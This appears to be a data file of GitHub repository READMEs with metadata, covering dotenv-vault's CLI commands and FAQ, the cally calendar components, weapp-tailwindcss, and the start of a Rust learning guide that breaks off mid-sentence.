</a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/languages/nodejs/bitbucket"> <img src="https://api.iconify.design/devicon/bitbucket.svg" alt="Bitbucket", width="20" /> Bitbucket </a> </td> </tr> <tr> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/languages/nodejs"> <img src="https://api.iconify.design/devicon/nodejs.svg" alt="Node.js", width="20" /> Node.js </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/frameworks/express"> <img src="https://api.iconify.design/devicon/express.svg" alt="Express", width="20" /> Express </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/frameworks/nextjs"> <img src="https://api.iconify.design/devicon/nextjs.svg" alt="NextJS", width="20" /> NextJS </a> </td> </tr> <tr> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/frameworks/remix"> <img src="https://api.iconify.design/skill-icons/remix-dark.svg" alt="Remix", width="20" /> Remix </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/frameworks/astro/netlify"> <img src="https://api.iconify.design/devicon/astro.svg" alt="Astro", width="20" /> Astro </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/frameworks/rails"> <img src="https://api.iconify.design/logos/rails.svg" alt="Rails", width="20" /> Rails </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/languages/ruby"> <img src="https://api.iconify.design/logos/ruby.svg" alt="Ruby", width="20" /> Ruby </a> </td> </tr> <tr> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/frameworks/sinatra/heroku"> <img src="https://api.iconify.design/logos/sinatra.svg" alt="Sinatra", width="20" /> Sinatra </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/frameworks/flask/heroku"> <img src="https://api.iconify.design/devicon/flask.svg" alt="Flask", width="20" /> Flask </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/languages/python"> <img src="https://api.iconify.design/devicon/python.svg" alt="Python", width="20" /> Python </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/integrations/supabase/nodejs?r=1"> <img 
src="https://api.iconify.design/devicon/supabase.svg" alt="Supabase", width="20" /> Supabase </a> </td> </tr> <tr> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/languages/nodejs/pulumi"> <img src="https://api.iconify.design/vscode-icons/file-type-pulumi.svg" alt="Pulumi", width="20" /> Pulumi </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/frameworks/angular/vercel"> <img src="https://api.iconify.design/devicon/angular.svg" alt="Angular", width="20" /> Angular </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/frameworks/nuxtjs"> <img src="https://api.iconify.design/logos/nuxt-icon.svg" alt="Nuxt", width="20" /> Nuxt </a> </td> <td align="left" valign="middle"> <a href="https://www.dotenv.org/docs/frameworks/vite/vercel"> <img src="https://api.iconify.design/devicon/vite.svg" alt="Vite", width="20" /> Vite </a> </td> </tr> </tbody> </table> <a href="https://www.dotenv.org/docs/">See more integration guides</a> ## ๐Ÿ“– Commands ``` $ npx dotenv-vault@latest help ``` * [new](#new) * [login](#login) * [logout](#logout) * [push](#push) * [pull](#pull) * [open](#open) * [whoami](#whoami) * [build](#build) * [keys](#keys) * [rotatekey](#rotatekey) * [decrypt](#decrypt) * [versions](#versions) * [local](#local-build) * [local build](#local-build) * [local decrypt](#local-decrypt) * [local keys](#local-keys) ### `new` Create your project at Dotenv Vault. Example: ```bash $ npx dotenv-vault@latest new ``` ##### ARGUMENTS *[DOTENV_VAULT]* Set .env.vault identifier. Defaults to generated value. ``` $ npx dotenv-vault@latest new vlt_6beaae5โ€ฆ local: Adding .env.vault (DOTENV_VAULT)... done local: Added to .env.vault (DOTENV_VAULT=vlt_6beaa...) ``` ##### FLAGS *-y, --yes* Automatic yes to prompts. Assume yes to all prompts and run non-interactively. --- ### `login` Log in to dotenv-vault. Example: ```bash $ npx dotenv-vault@latest login ``` ##### ARGUMENTS *[DOTENV_ME]* Set .env.me identifier. Defaults to generated value. ``` $ npx dotenv-vault@latest login me_00c7faโ€ฆ ``` ##### FLAGS *-y, --yes* Automatic yes to prompts. Assume yes to all prompts and run non-interactively. ``` $ npx dotenv-vault@latest login -y ``` --- ### `logout` Log out of dotenv-vault. Example: ```bash $ npx dotenv-vault@latest logout ``` ##### FLAGS *-y, --yes* Automatic yes to prompts. Assume yes to all prompts and run non-interactively. ``` $ npx dotenv-vault@latest logout -y ``` --- ### `push` Push `.env` securely. Example: ```bash $ npx dotenv-vault@latest push ``` ##### ARGUMENTS *[ENVIRONMENT]* Set environment to push to. Defaults to development ``` $ npx dotenv-vault@latest push production ``` *[FILENAME]* Set input filename. Defaults to .env for development and .env.{environment} for other environments ``` $ npx dotenv-vault@latest push production .env.production ``` ##### FLAGS *-m, --dotenvMe* Pass .env.me (DOTENV_ME) credential directly (rather than reading from .env.me file) ``` $ npx dotenv-vault@latest push --dotenvMe=me_b1831eโ€ฆ ``` *-y, --yes* Automatic yes to prompts. Assume yes to all prompts and run non-interactively. ``` $ npx dotenv-vault@latest push -y ``` --- ### `pull` Pull `.env` securely. Example: ```bash $ npx dotenv-vault@latest pull ``` ##### ARGUMENTS *[ENVIRONMENT]* Set environment to pull from. Defaults to development ``` $ npx dotenv-vault@latest pull production ``` *[FILENAME]* Set output filename. 
Defaults to .env for development and .env.{environment} for other environments ``` $ npx dotenv-vault@latest pull production .env.production ``` ##### FLAGS *-m, --dotenvMe* Pass .env.me (DOTENV_ME) credential directly (rather than reading from .env.me file) ``` $ npx dotenv-vault@latest pull --dotenvMe=me_b1831eโ€ฆ ``` *-y, --yes* Automatic yes to prompts. Assume yes to all prompts and run non-interactively. ``` $ npx dotenv-vault@latest pull -y ``` If you want to pull a specific version you can do so. For example, ``` npx dotenv-vault@latest pull development@v14 ``` --- ### `open` Open project page. Example: ```bash $ npx dotenv-vault@latest open ``` ##### ARGUMENTS *[ENVIRONMENT]* Set environment to open to. Defaults to development. ``` $ npx dotenv-vault@latest open production ``` ##### FLAGS *-y, --yes* Automatic yes to prompts. Assume yes to all prompts and run non-interactively. ``` $ npx dotenv-vault@latest open -y ``` --- ### `whoami` Display the current logged in user. Example: ```bash $ npx dotenv-vault@latest whoami ``` ##### FLAGS *-m, --dotenvMe* Pass .env.me (DOTENV_ME) credential directly (rather than reading from .env.me file) ``` $ npx dotenv-vault@latest whoami dotenvMe=me_b1831eโ€ฆ ``` --- ### `build` Build .env.vault file. Example: ```bash $ npx dotenv-vault@latest build ``` ##### FLAGS *-m, --dotenvMe* Pass .env.me (DOTENV_ME) credential directly (rather than reading from .env.me file) ``` $ npx dotenv-vault@latest build dotenvMe=me_b1831eโ€ฆ ``` *-y, --yes* Automatic yes to prompts. Assume yes to all prompts and run non-interactively. ``` $ npx dotenv-vault@latest build -y ``` --- ### `keys` List .env.vault decryption keys. Example: ```bash $ npx dotenv-vault@latest keys ``` ##### ARGUMENTS *[ENVIRONMENT]* Set environment. Defaults to all. ``` $ npx dotenv-vault@latest keys productionโ€ฆ remote: Listing .env.vault decryption keys... done dotenv://:key_899..@dotenv.org/vault/.env.vault?environment=production ``` ##### FLAGS *-m, --dotenvMe* Pass .env.me (DOTENV_ME) credential directly (rather than reading from .env.me file) ``` $ npx dotenv-vault@latest keys dotenvMe=me_b1831eโ€ฆ ``` *-y, --yes* Automatic yes to prompts. Assume yes to all prompts and run non-interactively. ``` $ npx dotenv-vault@latest keys -y ``` --- ### `rotatekey` Rotate DOTENV_KEY. Example: ```bash $ npx dotenv-vault@latest rotatekey production ``` ##### FLAGS *-m, --dotenvMe* Pass .env.me (DOTENV_ME) credential directly (rather than reading from .env.me file) ``` $ npx dotenv-vault@latest rotatekey dotenvMe=me_b1831eโ€ฆ ``` *-y, --yes* Automatic yes to prompts. Assume yes to all prompts and run non-interactively. ``` $ npx dotenv-vault@latest rotatekey -y ``` --- ### `decrypt` Decrypt .env.vault locally. Example: ```bash $ npx dotenv-vault@latest decrypt dotenv://:key_1234@dotenv.org/vault/.env.vault?environment=development ``` ##### ARGUMENTS *[DOTENV_KEY]* Set `DOTENV_KEY` to decrypt .env.vault. Development key will decrypt development, production will decrypt production, and so on. ``` $ npx dotenv-vault@latest decrypt dotenv://:key_1234@dotenv.org/vault/.env.vault?environment=development ``` --- ### `versions` List version history. Example: ```bash $ npx dotenv-vault@latest versions ``` ##### ARGUMENTS *[ENVIRONMENT]* Set environment to check versions against. Defaults to development. 
``` $ npx dotenv-vault@latest versions production ``` ##### FLAGS *-m, --dotenvMe* Pass .env.me (DOTENV_ME) credential directly (rather than reading from .env.me file) ``` $ npx dotenv-vault@latest versions dotenvMe=me_b1831e… ``` *-y, --yes* Automatic yes to prompts. Assume yes to all prompts and run non-interactively. ``` $ npx dotenv-vault@latest versions -y ``` If you want to pull a specific version you can do so. For example, ``` npx dotenv-vault@latest pull development@v14 ``` --- ### `local build` Build .env.vault from local only Example: ```bash $ npx dotenv-vault@latest local build ``` This will encrypt the contents of your `.env` file and any `.env.ENVIRONMENT` files you have locally into your `.env.vault` file. ### `local decrypt` Decrypt .env.vault from local only Example: ```bash $ npx dotenv-vault@latest local decrypt dotenv://:key_1234@dotenv.local/vault/.env.vault?environment=development ``` ##### ARGUMENTS *[DOTENV_KEY]* Set `DOTENV_KEY` to decrypt .env.vault. Development key will decrypt development, production will decrypt production, and so on. ``` $ npx dotenv-vault@latest local decrypt dotenv://:key_1234@dotenv.local/vault/.env.vault?environment=development ``` ### `local keys` List .env.vault local decryption keys from .env.keys file Example: ```bash $ npx dotenv-vault@latest local keys local: Listing .env.vault decryption keys from .env.keys... done environment DOTENV_KEY ─────────── ──────────────────────────────────────────────────────────────────────────────────────────────────────────── development dotenv://:key_33ee..@dotenv.local/vault/.env.va… production dotenv://:key_7038..@dotenv.local/vault/.env.va… ``` ##### ARGUMENTS *[ENVIRONMENT]* Set `ENVIRONMENT` to output a single environment's DOTENV_KEY. ``` $ npx dotenv-vault@latest local keys development… local: Listing .env.vault decryption keys from .env.keys... done dotenv://:key_a682c..@dotenv.local/vault/.env.vault?environment=development ``` ## ❓ FAQ ### Why is the `.env.vault` file not decrypting my environment variables successfully? First, make sure you are using `dotenv@16.1.0` or greater. (If you are using a different language make sure you have installed one of its [libraries](#what-languages-does-this-work-with).) Second, test decryption is working locally. ```bash $ npx dotenv-vault@latest decrypt dotenv://:key_1234..@dotenv.local/vault/.env.vault?environment=production # outputs environment variables ``` Third, test decryption on boot is working locally. ```bash $ DOTENV_KEY='dotenv://:key_1234..@dotenv.local/vault/.env.vault?environment=production' npm start # boots your app with production envs ``` ### Should I commit my `.env.vault` file? Yes. It is safe and recommended to do so. DO commit your `.env.vault` file to code. DO NOT commit your `.env` file. The `.env.vault` file contains ciphertext generated using AES-256. AES-256 is trusted by the US Government to transmit top-secret information and has a brute-force timescale of about a billion years. ### I accidentally leaked my `DOTENV_KEY`, what can I do? Does that attacker also have access to your `.env.vault` file? * No: good, the attacker cannot do any damage. They need both the `DOTENV_KEY` and `.env.vault` file to access your secrets.
This extra layer of security sets the `.env.vault` file apart as a superior solution to other SecretOps solutions. * Yes: IMMEDIATELY start rotating your secrets at your third-party API providers. This scenario would be the same no matter what SecretOps solution you use. After completing the above, rotate your `DOTENV_KEY` using the [rotatekey](#rotatekey) command, rebuild your `.env.vault` file, and redeploy. ### Is it safe to store my secrets with dotenv-vault? It is safer than scattering your secrets across multiple cloud providers. Those providers are focused on code deployment and server performance over secrets security.[1] Dotenv Vault's singular focus is secrets security, and as a result we go to great lengths to make sure your secrets are safe. After all, we keep our secrets here too.[2] * [[1] CircleCI Breach](https://techcrunch.com/2023/01/05/circleci-breach/) * [[2] Security at Dotenv Vault](https://www.dotenv.org/security) ### What languages does this work with? The `.env.vault` file and its encryption algorithm are language-agnostic, so technically it works with any language. We've built convenience libraries for it in a handful of languages and are adding more quickly. * [Go](https://github.com/dotenv-org/godotenvvault) * [Kotlin](https://github.com/dotenv-org/dotenv-vault-kotlin) * [NodeJS](https://github.com/motdotla/dotenv) * [PHP](https://github.com/dotenv-org/phpdotenv-vault) * [Python](https://github.com/dotenv-org/python-dotenv-vault) * [Ruby](https://github.com/dotenv-org/dotenv-vault-ruby) ### How do I use 💻 Locally Managed dotenv-vault? There are a series of **💻 Locally Managed** commands available to you. Locally managed never makes a remote API call. It is completely managed on your machine. **🔐 Vault Managed** adds conveniences like backing up your .env file, secure sharing across your team, access permissions, and version history. **💻 Locally Managed** is a good choice for someone who would prefer to handle this coordination themselves and does not want to trust Dotenv Vault with their secrets. <a href="https://www.youtube.com/watch?v=Ad7Wl8iC3Rs"> <div align="right"> <img src="https://img.youtube.com/vi/Ad7Wl8iC3Rs/hqdefault.jpg" alt="how to deploy with a .env.vault file video tutorial" align="right" width="330" /> <img src="https://simpleicons.vercel.app/youtube/ff0000" alt="youtube/@dotenvorg" align="right" width="24" /> </div> </a> Here's how it works. Generate your `.env.vault` file. ```shell $ npx dotenv-vault@latest local build ``` This creates two files: * `.env.vault` - encrypted contents of .env* file(s) * `.env.keys` - decryption key(s) Boot using `.env.vault`. ``` $ DOTENV_KEY=<key string from .env.keys> npm start [dotenv@16.1.0][INFO] Loading env from encrypted .env.vault ``` Great! Next, set the `DOTENV_KEY` on your server. For example in heroku: ```shell $ heroku config:set DOTENV_KEY=<key string from .env.keys> ``` Commit your `.env.vault` file safely to code and deploy. Your `.env.vault` is decrypted on boot, its environment variables injected, and your app works as expected. Congratulations, your secrets are now much safer than scattered across multiple servers and cloud providers! ## Contributing See [CONTRIBUTING.md](CONTRIBUTING.md) ## Changelog See [CHANGELOG.md](CHANGELOG.md) ## License MIT
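To round off the FAQ above, here is a minimal Node boot sketch in TypeScript. It leans only on behavior this README already states for `dotenv@16.1.0+` (decrypting `.env.vault` when `DOTENV_KEY` is set, loading the plain `.env` file otherwise); the variable name `MY_SECRET` is a hypothetical placeholder, not part of any real vault.

```ts
// Minimal boot sketch. Assumption: dotenv@16.1.0 or greater is installed.
// With DOTENV_KEY set in the environment, dotenv decrypts .env.vault and
// injects its variables; with DOTENV_KEY unset, it loads the plain .env file.
import "dotenv/config";

// MY_SECRET is a hypothetical variable name, used only for illustration.
console.log(process.env.MY_SECRET ?? "MY_SECRET is not set");
```

Running this with the `DOTENV_KEY='dotenv://…?environment=production' npm start` pattern from the FAQ should print the production value, which is a quick way to confirm decryption on boot before deploying.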
sync .env filesโ€”from the creator of `dotenv`.
dotenv,env,secrets
1
5
171
822
38
7
1
WickyNilliams/cally
# Cally Small, feature-rich calendar components - **Small bundle size** - less than 8.5KB min/gzip - **Full feature set** - single dates, ranges, display multiple months - **HTML-friendly** - easy to author, framework-independent - **Minimal dependencies** - just one - **Accessible** - keyboard and screen reader support - **Localizable** - `Intl.DateTimeFormat`, CSS logical properties, RTL support - **Themeable** - CSS parts and custom properties to offer flexibility and power - **Composable** - imposes no DOM-specific structure, plays well with others ## Installation ```bash npm install cally ``` ## Usage ### Via module ```js import "cally"; ``` ### Via CDN ```html <script type="module" src="https://unpkg.com/cally"></script> ``` ### Using the components ```html <calendar-range months="2"> <calendar-month></calendar-month> <calendar-month offset="1"></calendar-month> </calendar-range> ``` ## Docs For full documentation, visit: https://wicky.nillia.ms/cally/ ## License MIT
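Beyond the declarative markup above, the components can also be driven from script. The TypeScript sketch below is a hypothetical usage example rather than part of this README: it assumes that `<calendar-range>` exposes a string `value` property and emits a `change` event, and that a range is encoded as `start/end` in ISO format; verify the exact event name and value shape against the docs at https://wicky.nillia.ms/cally/.

```ts
// Hypothetical sketch: reacting to selection changes on <calendar-range>.
// Assumptions (check the docs): the element has a string `value` property
// and fires a "change" event whenever the selected range changes.
import "cally";

const range = document.querySelector("calendar-range");

range?.addEventListener("change", (event) => {
  const el = event.target as HTMLElement & { value: string };
  // Assumed range encoding: "YYYY-MM-DD/YYYY-MM-DD".
  const [start, end] = el.value.split("/");
  console.log(`Selected ${start} to ${end}`);
});
```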
Small, feature-rich calendar components
web-component,datepicker,date-picker,webcomponent,calendar,calendar-component
0
3
28
131
4
2
2
sonofmagic/weapp-tailwindcss
<p align="center"> <a href="https://weapp-tw.icebreaker.top"> <img src="./assets/logo.png" alt="weapp-tailwindcss-logo" width="128"> </a> <br> <h1 align="center">weapp-tailwindcss</h1> </p> > ็ฎ€ไฝ“ไธญๆ–‡(zh-cn) | [English](./README_en.md) ![star](https://badgen.net/github/stars/sonofmagic/weapp-tailwindcss) ![dm0](https://badgen.net/npm/dm/weapp-tailwindcss) ![dm1](https://badgen.net/npm/dm/weapp-tailwindcss-webpack-plugin) ![license](https://badgen.net/npm/license/weapp-tailwindcss) [![test](https://github.com/sonofmagic/weapp-tailwindcss/actions/workflows/test.yml/badge.svg?branch=main)](https://github.com/sonofmagic/weapp-tailwindcss/actions/workflows/test.yml) [![codecov](https://codecov.io/gh/sonofmagic/weapp-tailwindcss/branch/main/graph/badge.svg?token=zn05qXYznt)](https://codecov.io/gh/sonofmagic/weapp-tailwindcss) > [!NOTE] > ้™ไฝŽๅผ€ๅ‘็ปดๆŠคๆˆๆœฌ๏ผŒๆๅ‡ๅผ€ๅ‘ๆ•ˆ็Ž‡็š„ `ๅฐ็จ‹ๅบ` `tailwindcss` ๅ…จๆ–น้ข่งฃๅ†ณๆ–นๆกˆ > > `Tailwindcss/Unocss UI` ็”Ÿๆˆๆๅ–ๅ™จ: [`IceStack`](https://ui.icebreaker.top/zh-CN) ๅทฒ็ปๅ‘ๅธƒ๏ผŒๅฟซๆฅ็”จๅฎƒ็ฎก็†ไฝ ็š„ๅŽŸๅญๅŒ–`CSS` ็ป„ไปถๅง๏ผ \[[ๅ›ฝๅ†…้ƒจ็ฝฒ็š„ๆ–‡ๆกฃๅœฐๅ€](https://weapp-tw.icebreaker.top)\] \| \[[ๅค‡็”จGithub Page](https://sonofmagic.github.io/weapp-tailwindcss/)\] \| \[[1.xๆ–‡ๆกฃ]('./v1.md')\] - [็‰นๆ€ง](#็‰นๆ€ง) - [็‰ˆๆœฌๅฏนๅบ”](#็‰ˆๆœฌๅฏนๅบ”) - [ๅฎ‰่ฃ…ไธŽไฝฟ็”จๆ–นๅผ](#ๅฎ‰่ฃ…ไธŽไฝฟ็”จๆ–นๅผ) - [็”Ÿๆ€ๅ’Œ่งฃๅ†ณๆ–นๆกˆ](#็”Ÿๆ€ๅ’Œ่งฃๅ†ณๆ–นๆกˆ) - [ๅธธ่ง้—ฎ้ข˜](#ๅธธ่ง้—ฎ้ข˜) - [็Žฐๆˆ้…็ฝฎๅฅฝ็š„ๅ„ไธชๆก†ๆžถ็š„ๆจกๆฟ](#็Žฐๆˆ้…็ฝฎๅฅฝ็š„ๅ„ไธชๆก†ๆžถ็š„ๆจกๆฟ) - [ๆ—ง็‰ˆๆœฌ่ฟ็งปๆŒ‡ๅ—](#ๆ—ง็‰ˆๆœฌ่ฟ็งปๆŒ‡ๅ—) - [้…็ฝฎ้กนๅ‚่€ƒ](#้…็ฝฎ้กนๅ‚่€ƒ) - [ๅ˜ๆ›ดๆ—ฅๅฟ—](#ๅ˜ๆ›ดๆ—ฅๅฟ—) - [Tips](#tips) - [Contribute](#contribute) - [License](#license) - [Star History](#star-history) - [Related projects](#related-projects) - [IceStack](#icestack) - [weapp-ide-cli](#weapp-ide-cli) - [weapp-pandacss](#weapp-pandacss) ## ็‰นๆ€ง | ไธไป…ไป…ๆ˜ฏ`webpack` | ไธปๆตๆก†ๆžถไธŽๅŽŸ็”Ÿๅผ€ๅ‘ๆ”ฏๆŒ | | --------------------------------------------------- | ----------------------------------------------- | | ![wepback+vite+gulp](./assets/weapp-tw-plugins.png) | ![frameworks](./assets/weapp-tw-frameworks.png) | ๆ ธๅฟƒๆ’ไปถๆ”ฏๆŒ `webpack`/`vite`/`gulp` ไธบๅŸบๅบ•็š„ๆก†ๆžถ็ฑปๅฐ็จ‹ๅบๅผ€ๅ‘๏ผŒๆถต็›–ไบ†ๅธ‚้ขไธŠๅ‡ ไนŽๆ‰€ๆœ‰็š„ไธปๆต็š„ๅผ€ๅ‘ๆก†ๆžถใ€‚ ๅŒๆ—ถไนŸๆ”ฏๆŒๆœ€ๅŽŸ็”Ÿ็š„ๅผ€ๅ‘่€…ๅทฅๅ…ทๅˆ›ๅปบ็š„ๅŽŸ็”Ÿๅฐ็จ‹ๅบๅบ”็”จใ€‚ ่ฟ™ไบ›ๆ’ไปถ่ƒฝๅคŸ่‡ชๅŠจ่ฏ†ๅˆซๅนถ็ฒพ็กฎๅค„็†ๆ‰€ๆœ‰ `tailwindcss` ็š„ๅทฅๅ…ท็ฑปๆฅ้€‚้…ๅฐ็จ‹ๅบ็Žฏๅขƒใ€‚ ## ็‰ˆๆœฌๅฏนๅบ” ็›ฎๅ‰๏ผŒ`weapp-tailwindcss` ็š„ `2.x` ๅ’Œ `3.x` ๆ”ฏๆŒๆœ€ๆ–ฐ็‰ˆๆœฌ็š„ `tailwindcss v3.x.x` ็‰ˆๆœฌๅ’Œ `webpack5`๏ผŒ`webpack4`, `vite` ๅ’Œ `gulp`ใ€‚ไปŽ `3.2.0` ๅผ€ๅง‹๏ผŒ`weapp-tailwindcss` ๆ”ฏๆŒๆœ€ๅŽŸ็”Ÿ็š„ๅฐ็จ‹ๅบๅผ€ๅ‘ๆ–นๅผใ€‚ > ๅฆ‚ๆžœไฝ ่ฟ˜ๅœจไฝฟ็”จ `tailwindcss@2` ็‰ˆๆœฌ๏ผŒ้‚ฃไฝ ๅบ”่ฏฅไฝฟ็”จๆœฌๆ’ไปถ็š„ `1.x`/`webpack4` ็‰ˆๆœฌใ€‚ๅฆๅค–่ฏท็กฎไฟไฝ ็š„ `nodejs` ็‰ˆๆœฌ `>=16.6.0`ใ€‚็›ฎๅ‰ไฝŽไบŽ `16` ็š„้•ฟๆœŸ็ปดๆŠค็‰ˆๆœฌ(`ๅถๆ•ฐ็‰ˆๆœฌ`) ้ƒฝๅทฒ็ป็ป“ๆŸไบ†็”Ÿๅ‘ฝๅ‘จๆœŸ๏ผŒๅปบ่ฎฎๅฎ‰่ฃ… `nodejs` ็š„ `LTS`็‰ˆๆœฌ๏ผŒ่ฏฆ่ง [nodejs/release](https://github.com/nodejs/release) ## [ๅฎ‰่ฃ…ไธŽไฝฟ็”จๆ–นๅผ](https://weapp-tw.icebreaker.top/docs/quick-start/install) ## [็”Ÿๆ€ๅ’Œ่งฃๅ†ณๆ–นๆกˆ](https://weapp-tw.icebreaker.top/docs/community/templates) ## [ๅธธ่ง้—ฎ้ข˜](https://weapp-tw.icebreaker.top/docs/issues/) ## [็Žฐๆˆ้…็ฝฎๅฅฝ็š„ๅ„ไธชๆก†ๆžถ็š„ๆจกๆฟ](https://weapp-tw.icebreaker.top/docs/community/templates) ## [ๆ—ง็‰ˆๆœฌ่ฟ็งปๆŒ‡ๅ—](https://weapp-tw.icebreaker.top/docs/migrations/v2) ## 
[้…็ฝฎ้กนๅ‚่€ƒ](https://weapp-tw.icebreaker.top/docs/api/interfaces/UserDefinedOptions) ## [ๅ˜ๆ›ดๆ—ฅๅฟ—](./CHANGELOG.md) ## Tips ๅ‰ๆฒฟ้˜…่ฏป: [Whatโ€™s Tailwind Oxide Engine? The Next Evolution of Tailwind CSS](https://medium.com/@bomber.marek/whats-tailwind-oxide-engine-the-next-evolution-of-tailwind-css-32e7ef8e19a1) ๆœชๆฅ `tailwindcss@4` ไผšๅˆ‡ๆขๅˆฐ่ฟ™ไธชๅผ•ๆ“Žๆฅๅคงๅน…ๅŠ ๅฟซๆž„ๅปบๅ’Œ่ฟ่กŒ้€Ÿๅบฆ๏ผŒๅฝ“็„ถ็ญ‰ๅฎƒๅ‘ๅธƒๆญฃๅผ็‰ˆๆœฌ็š„ๆ—ถๅ€™๏ผŒๆˆ‘ไนŸไผšๅฐฝๅฏ่ƒฝ็ฌฌไธ€ๆ—ถ้—ดๅŽป่ฟ›่กŒๅ…ผๅฎนๆ–ฐ็š„ๅผ•ๆ“Žใ€‚ ## Contribute ๆˆ‘ไปฌ้‚€่ฏทไฝ ๆฅ่ดก็Œฎๅ’ŒๅธฎๅŠฉๆ”น่ฟ› `weapp-tailwindcss` ๐Ÿ’š๐Ÿ’š๐Ÿ’š ไปฅไธ‹ๆœ‰ๅ‡ ไธชๆ–นๅผๅฏไปฅๅ‚ไธŽ: - ๆŠฅๅ‘Š้”™่ฏฏ๏ผšๅฆ‚ๆžœๆ‚จ้‡ๅˆฐไปปไฝ•้”™่ฏฏๆˆ–้—ฎ้ข˜๏ผŒ่ฏทๆ`issue`ๅนถๆไพ›ๅฎŒๅ–„็š„้”™่ฏฏไฟกๆฏๅ’Œๅค็Žฐๆ–นๅผใ€‚ - ๅปบ่ฎฎ๏ผšๆœ‰ๅขžๅผบ `weapp-tailwindcss` ็š„ๆƒณๆณ•ๅ—๏ผŸ่ฏทๆ `issue` ๆฅๅˆ†ไบซๆ‚จ็š„ๅปบ่ฎฎใ€‚ - ๆ–‡ๆกฃ๏ผšๅฆ‚ๆžœๆ‚จๅฏนๆ–‡ๆกฃๆœ‰ๆ›ดๅฅฝ็š„่ง่งฃๆˆ–่€…ๆ›ดๆฃ’็š„ไฟฎ่พžๆ–นๅผ๏ผŒๆฌข่ฟŽ `pr`ใ€‚ - ไปฃ็ ๏ผšไปปไฝ•ไบบ็š„ไปฃ็ ้ƒฝไธๆ˜ฏๅฎŒ็พŽ็š„๏ผŒๆˆ‘ไปฌๆฌข่ฟŽไฝ ้€š่ฟ‡ `pr` ็ป™ไปฃ็ ๆไพ›ๆ›ดๅฅฝ็š„่ดจ้‡ไธŽๆดปๅŠ›ใ€‚ ## License [MIT](./LICENSE) ## Star History [![Star History Chart](https://api.star-history.com/svg?repos=sonofmagic/weapp-tailwindcss&type=Date)](https://star-history.com/#sonofmagic/weapp-tailwindcss&Date) ## Related projects ### IceStack [IceStack](https://github.com/sonofmagic/icestack): โค๏ธ IceStack, Web UI for Mobile, PC, open-source Css component library generator ### weapp-ide-cli [weapp-ide-cli](https://github.com/sonofmagic/utils/tree/main/packages/weapp-ide-cli): ไธ€ไธชๅพฎไฟกๅผ€ๅ‘่€…ๅทฅๅ…ทๅ‘ฝไปค่กŒ๏ผŒๅฟซ้€Ÿๆ–นไพฟ็š„็›ดๆŽฅๅฏๅŠจ ide ่ฟ›่กŒ็™ปๅฝ•๏ผŒๅผ€ๅ‘๏ผŒ้ข„่งˆ๏ผŒไธŠไผ ไปฃ็ ็ญ‰็ญ‰ๅŠŸ่ƒฝใ€‚ ### weapp-pandacss [weapp-pandacss](https://github.com/sonofmagic/weapp-pandacss) `CSS-in-JS` ็ผ–่ฏ‘ๆ—ถๆก†ๆžถ็š„ๅฐ็จ‹ๅบ้€‚้…ๅ™จ
bring tailwindcss to weapp! Bring the atomic-CSS mindset of `tailwindcss` into mini-program development! Formerly `weapp-tailwindcss-webpack-plugin`
mp,weapp,tailwindcss,webpack,postcss,mini,tailwind,vite,tarojs,uni-app
29
2
170
1,595
16
48
3
jondot/rust-how-do-i-start
# Rust :crab:. How do I start? Collaborative advice for a casual question that gets asked many times, so here it is as a GitHub repo anyone can contribute to and improve! * 👁️ Before you start, watch this repo (GitHub watch button) so you can get updates when we add stuff * 👾 Play with this page first! Take an hour to look at all the stuff that's linked from top to bottom. Watch a few videos, scroll through a couple of blogs. Then start with the main track. * 👷‍♀️ While you're working your way through, feel free to ask questions about ways to start in Rust in [Discussions](https://github.com/jondot/rust-how-do-i-start/discussions) * 🎊 Feel free to add suggestions and PRs of your own: https://github.com/jondot/rust-how-do-i-start#contributing ## 🍱 What to expect? _Some hand-selected articles to give you a feeling of what the journey is like._ * [My own key learnings after 30k LOC in Rust](https://jondot.medium.com/my-key-learnings-after-30-000-loc-in-rust-a553e6403c19) - I can say that today the experience is much greater than back then. There's so much more to learn from, and the ecosystem is huge. Still, the core ideas in the article are relevant. # 🚜 Main track _This is largely the learning path you should follow. It is hand-selected, minimal, high-value, and highly effective content only_ * 📚 Reading (code or text) * 🏋️‍♀️ Exercise * 🏗️ Building 1. 🦀 The 📚[Rust Book](https://doc.rust-lang.org/book/). You can read it cover to cover, or skim it. Whatever you do, make sure you have a pet project idea to experiment with. You can pick 📚[any of the core utils you like](https://github.com/uutils/coreutils/tree/main/src/uu). The advantage of just re-implementing a core util is that you are probably familiar with one of those; they're just CLI apps, so you're not biting off more than you can chew; and you do have the source code in that repo for reference. * 🎬 Feeling a bit lost? You can watch [Getting Started with Rust: Understanding Rust Compile Errors](https://www.youtube.com/watch?v=hgZQJys2zpY) and [part 2](https://www.youtube.com/watch?v=9391GxkYPyY), which are a _great_ intro to errors, the borrow checker, and more. * 🥸 If you're coming from dynamic programming languages, expect the reading process to be less "flowing" and to involve more thinking about types and the type system. If you're stuck and want to "translate" concepts to your own dynamic world, feel free to ask [here](https://github.com/jondot/rust-how-do-i-start/discussions) * 🫶 You don't have to read it cover to cover. Get to a nice, working CLI app for starters. * 🏋️‍♀️ If you like exercises as a learning aid, you can swap "building a small project" while reading the Rust book for 🏋️‍♀️[rustlings](https://github.com/rust-lang/rustlings) 2. 🧰 Pick a hobby project that's useful for you. Something more than trivial that includes data passing and a few modules (just so you get to experience the borrow checker and data modeling); something in the scope of 🏗️[bat](https://github.com/sharkdp/bat/tree/master/src). Work on it and go back to the Rust book from time to time (as well as, well, StackOverflow). Rinse, repeat. * 🤷‍♀️ Don't have an idea for a hobby project? 🏋️‍♀️[PNGMe](https://picklenerd.github.io/pngme_book/introduction.html) is a good project to build, plus it comes in a book-and-exercise format. Look at the [project idea list](https://github.com/jondot/rust-how-do-i-start#-project-ideas) too. * 🎩 Don't want to work on a project at all? The 🏋️‍♀️[too many 